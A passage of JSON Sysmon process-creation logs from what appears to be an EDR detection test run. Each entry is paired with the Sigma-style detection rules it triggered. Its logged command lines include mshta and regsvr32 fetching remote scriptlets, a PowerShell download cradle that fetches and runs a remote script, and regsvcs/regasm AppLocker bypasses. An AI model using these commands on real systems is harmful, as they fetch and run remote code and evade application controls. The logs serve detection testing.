(WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command 
Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows 
PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: 
NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component 
Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft 